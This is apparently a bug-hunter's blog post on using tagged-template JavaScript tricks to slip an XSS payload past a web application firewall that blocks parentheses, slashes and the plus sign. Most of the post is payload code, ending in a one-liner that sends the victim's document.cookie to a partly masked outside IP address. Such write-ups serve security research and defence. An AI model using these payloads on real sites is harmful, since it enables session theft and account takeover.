How I Bypassed a tough WAF to steal user cookies using XSS!

Finding The XSS:

test';alert(1);a='test
test';alert`1`;a='test

WAF Bypass:

alert(document.domain)
// 'www.example.com'
alert`document.domain`
// 'document.domain'
setTimeout`alert\x281\x29`
// will execute alert(1)
setTimeout`alert\x28document.domain\x29`
// will execute alert(document.domain)

Changing My Approach:

document.location="https://40.112.XX.XX/?cookies="+document.cookie;
  • The Forward-slash → /
  • The colon → :
  • The + Operator → +

Finding a way to concatenation:

  • The + Operator → which is blocked as mentioned
  • concat() → It uses the Round Brackets ( ) → blocked
  • join() → It uses the Round Brackets ( ) → blocked
['Melo', 'tover'].join('');
// 'Melotover'
['Hello', 'World'].join(' ');
// 'Hello World'
['Hello', 'World'].join(',');
// 'Hello,World'
['Melo', 'tover'].join``;
// 'Melotover'
var a = 'Find Bypass ';
var b = 'Like Melotover!';
[a, b].join``;
// 'Find Bypass Like Melotover!'

Make a valid URL:

document.location.origin
--> https://www.example.com
document.location.pathname
--> /path/name
[document.location.origin, '@40.112.xx.xx’].join``;
 --> 'https://www.example.com@40.112.xx.xx'
[document.location.origin, '@40.112.xx.xx’,document.cookie].join``;
--> https://www.example.com@40.112.xx.xxCookieP=value;CookieP2=value2;
[document.location.origin, '@40.112.xx.xx', document.location.pathname, document.cookie].join``;--> https://www.example.com@40.112.xx.xx/path/nameCookieP=value;CookieP2=value2;
melo = [document.location.origin, '@40.112.xx.xx',document.location.pathname,document.cookie].join``;document.location = melo;
a=[location.origin, '@40.112.xx.xx',location.pathname,cookie].join``;location=a;

--

--

--

Computer Engineering Student | Bug Hunter | CTF Player | AKA Melotover

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Angular, NX and Storybook

Creating an Undefined Return Type Signature in Typescript

Get ready for SCA (Strong Customer Authentication) IAP transactions in the EU | IAPHUB

Making an Enact Theme

Screenshot of the Hello World app using neutron skin from uranium theme

DOM Events and Touch Event Listeners

Create your custom Apollo client for AWS AppSync to use Hooks

Spring — Autowiring | Code Factory

Creating a Rails API with Javascript

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Asem Eleraky

Asem Eleraky

Computer Engineering Student | Bug Hunter | CTF Player | AKA Melotover

More from Medium

The Tale of a Click leading to RCE

Cloudflare WAF bypass via Origin IP

Easy Understanding of Owasp Top 10-2021

Password Reset to Admin Access